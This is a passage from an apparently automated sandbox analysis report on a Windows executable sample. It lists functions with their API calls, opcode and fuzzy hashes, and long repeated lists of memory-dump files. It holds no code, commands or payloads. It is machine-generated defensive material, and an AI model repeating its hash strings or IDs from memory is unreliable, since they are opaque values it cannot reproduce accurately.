Instruction Fuzzy Hash: 30D09E71658301AFEF098F20DE16F2E7AA2EB84B01F10562CB642940E0D6715C15DB16

Uniqueness

Uniqueness Score: -1.00%

Function 004057E6 Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(?,?,004053FE,?,?,00000000,004055E1,?,?,?,?), ref: 004057EB
SetFileAttributesA.KERNEL32(?,00000000), ref: 004057FF

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 9001e84463e5b3d4dd00ca1d2e00f3bb66c1d6c16300b22364f3152d7eb201de
Instruction ID: aa63d8e265fec5eadac8fa568c07c8a88d9efeeaed3b0596099faf0ea9ff9f2d
Opcode Fuzzy Hash: 9001e84463e5b3d4dd00ca1d2e00f3bb66c1d6c16300b22364f3152d7eb201de
Instruction Fuzzy Hash: 4FD0C972908120EBD2102728AD0889BBB55EB542717028B31FC65A22F0C7304C62CAA5

Uniqueness

Uniqueness Score: -1.00%

Function 00401650 Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON

Download Yara Rule

APIs

MoveFileA.KERNEL32(00000000,00000000), ref: 0040166B

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: c3189b913f4bdfc7a50826e090988e233579a56b949653883f3a96102e5b8159
Instruction ID: fdd1d07a1cda23b4c621ee5f99cf321ddf643a1f3ef69347ea822d0c43c5abfe
Opcode Fuzzy Hash: c3189b913f4bdfc7a50826e090988e233579a56b949653883f3a96102e5b8159
Instruction Fuzzy Hash: 20F0E936A08121A3CB50B7B64E4DD5F22A49F81328F24473BB111B21D5EABC8A42E55F

Uniqueness

Uniqueness Score: -1.00%

Function 0040223D Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 00402276

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 7a5cf04908828b9370c7e1d9ddcee0dd976931224771c270c0e0b8fcf7056786
Instruction ID: dff1fc4e61f6baddcfaee85270a2ae07bc7b47d3ff6ea6eee97db9607061b2c7
Opcode Fuzzy Hash: 7a5cf04908828b9370c7e1d9ddcee0dd976931224771c270c0e0b8fcf7056786
Instruction Fuzzy Hash: CCE04F72B041756ADB903AF10E8DD7F21597B84344F24067EF601B62CAD9BC0D42626D

Uniqueness

Uniqueness Score: -1.00%

Function 00402B09 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?,?,004022CE,00000002), ref: 00402B31

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: cfdcf35e6c4fa250502a21fc57dd23c757fa136f3a88176d4338085178caf540
Instruction ID: 2505cc1c08e1157338d6304f64f5344ce4618cc943ce50a8c0e79a918c25dddd
Opcode Fuzzy Hash: cfdcf35e6c4fa250502a21fc57dd23c757fa136f3a88176d4338085178caf540
Instruction Fuzzy Hash: 30E046B6250108AEDB40EBA4ED4AE9A77ECAB08704F008121B608E7091CB78E5509B69

Uniqueness

Uniqueness Score: -1.00%

Function 00405883 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040307D,00000000,00000000,00402EB4,000000FF,00000004,00000000,00000000,00000000), ref: 00405897

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
Instruction ID: df475e3658bf3194c7d81d82672e2126c085ec444a71cd8ce056a8dbc7516895
Opcode Fuzzy Hash: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
Instruction Fuzzy Hash: DFE0B63261425AABEF10AE659C00AAB7B6CEF05261F008432BD25E2150E235E8219AA5

Uniqueness

Uniqueness Score: -1.00%

Function 00402281 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022B4

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: 4d18850fc1b70aa6ba1e60ee85fd3d2ecaf17a2ff09a7e68fe5c73ff56aba4af
Instruction ID: bdd16972d33a24d8f715dd244a4521dc24e47ebf505f01b716e53bc3963aa27b
Opcode Fuzzy Hash: 4d18850fc1b70aa6ba1e60ee85fd3d2ecaf17a2ff09a7e68fe5c73ff56aba4af
Instruction Fuzzy Hash: 03E08671A44205BADB406FA08D09EBD3668BF01710F10013AF9507B0D5EBB88442B71D

Uniqueness

Uniqueness Score: -1.00%

Function 00401595 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A0

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: e3a13878c1d56836359fd6a287f604c402d733337bfeebe65ae23d65cbfee957
Instruction ID: 27692f5c007c61cd34b15d2854f29c5ac536ba6a0fe93b079eee6ce04d3e2e01
Opcode Fuzzy Hash: e3a13878c1d56836359fd6a287f604c402d733337bfeebe65ae23d65cbfee957
Instruction Fuzzy Hash: 03D01273A04110DBDB00DBB5AE0899D7364AB44329F208637D111F11D0D6B98541A629

Uniqueness

Uniqueness Score: -1.00%

Function 00403EB4 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00010468,00000000,00000000,00000000), ref: 00403EC6

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 499d621b576c19b091bc41f39921371812b2519aa52b2e9da7a6b0776abc8bab
Instruction ID: 4e2cb91dbe0d2d692b2d6efd4920526f8e19958c85e819a44f08040356fb0c65
Opcode Fuzzy Hash: 499d621b576c19b091bc41f39921371812b2519aa52b2e9da7a6b0776abc8bab
Instruction Fuzzy Hash: 4CC04C716552016BEA219B51DD49F077B586750B01F288425B214E50D1C674E411D66D

Uniqueness

Uniqueness Score: -1.00%

Function 00403080 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402DF2,0002FBE4), ref: 0040308E

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D

Uniqueness

Uniqueness Score: -1.00%

Function 00403E9D Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000028,?,00000001,00403CCE), ref: 00403EAB

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 35a6196438d1a925b40bb9ea9467f367b5e4dbb747a92e5962faa32c49fde1e9
Instruction ID: ba241267bb6bb17dd96f019753e8ffde110831ee2db3609d4ff9709f9aeeb587
Opcode Fuzzy Hash: 35a6196438d1a925b40bb9ea9467f367b5e4dbb747a92e5962faa32c49fde1e9
Instruction Fuzzy Hash: 9DB09235985200AAEA224B00DD09F457A62A7A4702F008024B200240F0C7B200A0DB19

Uniqueness

Uniqueness Score: -1.00%

Function 00403E8A Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00403C67), ref: 00403E94

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 55a9af0324514cff772be1897e352456f34009a7f25595ef81cb2bf9e2c159b8
Instruction ID: c344ebf8080bf58bdbcf791898ba473ebe4cebcd01df1b5cfbd91641023a3e3b
Opcode Fuzzy Hash: 55a9af0324514cff772be1897e352456f34009a7f25595ef81cb2bf9e2c159b8
Instruction Fuzzy Hash: 76A01132808002EBCB028B00EF0AC0ABF22ABA0B00B028822F200800308A320820FF0A

Uniqueness

Uniqueness Score: -1.00%

Function 004014D6 Relevance: 1.3, APIs: 1, Instructions: 17sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00000000), ref: 004014E5

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
